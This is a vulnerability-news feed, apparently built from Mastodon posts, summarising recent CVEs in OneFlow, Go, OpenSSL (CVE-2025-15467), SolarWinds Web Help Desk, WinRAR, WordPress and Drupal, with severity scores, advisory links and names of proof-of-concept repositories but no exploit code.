thehackerwire@mastodon.social at 2026-01-29T20:19:53.000Z ##

🟠 CVE-2025-70999 - High (7.5)

A GPU device-ID validation flaw in the flow.cuda.get_device_capability() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted device ID.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65891
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T17:16:20.240000

2 posts

A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a Denial of Dervice (DoS) by invoking flow.cuda.get_device_properties() with an invalid or negative device index.

thehackerwire@mastodon.social at 2026-01-29T21:34:05.000Z ##

🟠 CVE-2025-65891 - High (7.5)

A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a Denial of Dervice (DoS) by invoking flow.cuda.get_device_properties() with an invalid or negative device index.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T21:34:05.000Z ##

🟠 CVE-2025-65891 - High (7.5)

A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a Denial of Dervice (DoS) by invoking flow.cuda.get_device_properties() with an invalid or negative device index.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65890
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T17:16:20.053000

2 posts

A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.

thehackerwire@mastodon.social at 2026-01-30T07:54:32.000Z ##

🟠 CVE-2025-65890 - High (7.5)

A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T07:54:32.000Z ##

🟠 CVE-2025-65890 - High (7.5)

A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-61731
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T17:16:19.917000

2 posts

Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pkg-config command. An attacker can provide a "--log-file" argument to this directive, causing pkg-config to write to an attacker-controlled location.

thehackerwire@mastodon.social at 2026-01-29T18:01:42.000Z ##

🟠 CVE-2025-61731 - High (7.8)

Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pk...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T18:01:42.000Z ##

🟠 CVE-2025-61731 - High (7.8)

Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pk...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14975
(8.1 HIGH)

EPSS: 0.01%

updated 2026-01-29T17:16:15.460000

2 posts

The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a proper password reset process, allowing a few unauthenticated requests to reset the password of any user by knowing their username, such as administrator ones, and therefore gain access to their account

thehackerwire@mastodon.social at 2026-01-29T18:01:32.000Z ##

🟠 CVE-2025-14975 - High (8.1)

The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a proper password reset process, allowing a few unauthenticated requests to reset the password of any user by knowing their username, such as administrator ones, and ther...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T18:01:32.000Z ##

🟠 CVE-2025-14975 - High (8.1)

The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a proper password reset process, allowing a few unauthenticated requests to reset the password of any user by knowing their username, such as administrator ones, and ther...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14840
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T17:16:15.243000

2 posts

Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTTP Client Manager allows Forceful Browsing.This issue affects HTTP Client Manager: from 0.0.0 before 9.3.13, from 10.0.0 before 10.0.2, from 11.0.0 before 11.0.1.

thehackerwire@mastodon.social at 2026-01-29T18:01:53.000Z ##

🟠 CVE-2025-14840 - High (7.5)

Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTTP Client Manager allows Forceful Browsing.This issue affects HTTP Client Manager: from 0.0.0 before 9.3.13, from 10.0.0 before 10.0.2, from 11.0.0 before 11.0.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T18:01:53.000Z ##

🟠 CVE-2025-14840 - High (7.5)

Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTTP Client Manager allows Forceful Browsing.This issue affects HTTP Client Manager: from 0.0.0 before 9.3.13, from 10.0.0 before 10.0.2, from 11.0.0 before 11.0.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15467
(9.8 CRITICAL)

EPSS: 0.12%

updated 2026-01-29T16:31:35.700000

13 posts

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. Impact summary: A stack buffer overflow may lead to a crash, causing Denial of Service, or potentially remote code execution. When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 para

2 repos

https://github.com/balgan/CVE-2025-15467

https://github.com/guiimoraes/CVE-2025-15467

thehackerwire@mastodon.social at 2026-01-30T07:54:43.000Z ##

🔴 CVE-2025-15467 - Critical (9.8)

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously
crafted AEAD parameters can trigger a stack buffer overflow.

Impact summary: A stack buffer overflow may lead to a crash, causing Denial
of Service, or potentially remote code ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

mastokukei@social.josko.org at 2026-01-29T18:02:23.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- OpenSSL vulnerabilities and patches (CVE-2025-15467; 12 advisories)
- AI agent tooling and Model Context Protocol (MCP) including Claude Code benchmarks and multi‑agent pipelines
- FOSDEM 2026 and Python community events (PyCascades 2026; PyTexasConference2026)
- 11tyCMS public beta (IndieWeb/11tyCMS)
- Rust in Android and GPU [1/2]

##

Andy_Thompson at 2026-01-29T17:54:31.001Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-30T07:54:43.000Z ##

🔴 CVE-2025-15467 - Critical (9.8)

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously
crafted AEAD parameters can trigger a stack buffer overflow.

Impact summary: A stack buffer overflow may lead to a crash, causing Denial
of Service, or potentially remote code ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Andy_Thompson@infosec.exchange at 2026-01-29T17:54:31.000Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

harrysintonen@infosec.exchange at 2026-01-28T12:48:56.000Z ##

Yes, there's RCE in #OpenSSL 3.x, but thankfully it isn't in the HTTPS side of things:

"Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

openssl-library.org/news/vulne

##

hn50@social.lansky.name at 2026-01-27T19:55:07.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

Link: openssl-library.org/news/vulne
Discussion: news.ycombinator.com/item?id=4

##

jschauma@mstdn.social at 2026-01-27T18:27:05.000Z ##

OpenSSL Security Advisory

openssl-library.org/news/secad

One high, one medium, and 9 low severity issues.

The high severity is a stack buffer overflow in CMS AuthEnvelopedData parsing (CVE-2025-15467): attacker provides an oversized IV, leading to buffer overflow prior to authentication, possibly leading to remote code execution if you're parsing untrusted CMS or PKCS#7 content with AEAD (e.g., AES-GCM).

##

newsycombinator@framapiaf.org at 2026-01-27T18:00:44.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: openssl-library.org/news/vulne
Comments: news.ycombinator.com/item?id=4

##

ycombinator@rss-mstdn.studiofreesia.com at 2026-01-27T17:21:05.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
openssl-library.org/news/vulne
#ycombinator

##

CuratedHackerNews@mastodon.social at 2026-01-27T17:14:04.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

openssl-library.org/news/vulne

##

h4ckernews@mastodon.social at 2026-01-27T17:09:12.000Z ##

OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing

openssl-library.org/news/vulne

#HackerNews

##

CVE-2025-40551
(9.8 CRITICAL)

EPSS: 0.87%

updated 2026-01-29T16:31:35.700000

9 posts

SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

jbz@indieweb.social at 2026-01-29T23:19:00.000Z ##

⚠️ Critical Solarwinds Web Vulnerability Allows Remote Code Execution and Security Bypass

「 Multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD), culminating in unauthenticated remote code execution (RCE) via Java deserialization in CVE-2025-40551, were uncovered by Horizon3.ai researchers.
These flaws chain static credentials, security bypasses, and deserialization weaknesses, affecting versions prior to 2026.1 」

##

DarkWebInformer at 2026-01-29T18:10:38.923Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson at 2026-01-29T17:54:31.001Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

jbz@indieweb.social at 2026-01-29T23:19:00.000Z ##

⚠️ Critical Solarwinds Web Vulnerability Allows Remote Code Execution and Security Bypass

「 Multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD), culminating in unauthenticated remote code execution (RCE) via Java deserialization in CVE-2025-40551, were uncovered by Horizon3.ai researchers.
These flaws chain static credentials, security bypasses, and deserialization weaknesses, affecting versions prior to 2026.1 」

##

DarkWebInformer@infosec.exchange at 2026-01-29T18:10:38.000Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson@infosec.exchange at 2026-01-29T17:54:31.000Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-28T22:44:56.000Z ##

SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.

These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.

CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)

thehackerwire.com/solarwinds-p

##

_r_netsec@infosec.exchange at 2026-01-28T16:58:06.000Z ##

CVE-2025-40551: SolarWinds WebHelpDesk RCE Deep-Dive and Indicators of Compromise horizon3.ai/attack-research/cv

##

thehackerwire@mastodon.social at 2026-01-28T10:01:38.000Z ##

🔴 CVE-2025-40551 - Critical (9.8)

SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without au...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-40554
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

6 posts

SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

1 repos

https://github.com/imbas007/auth-bypass-CVE-2025-40554

DarkWebInformer at 2026-01-29T18:10:38.923Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson at 2026-01-29T17:54:31.001Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-01-29T18:10:38.000Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson@infosec.exchange at 2026-01-29T17:54:31.000Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-28T22:44:56.000Z ##

SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.

These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.

CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)

thehackerwire.com/solarwinds-p

##

thehackerwire@mastodon.social at 2026-01-28T10:15:06.000Z ##

🔴 CVE-2025-40554 - Critical (9.8)

SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

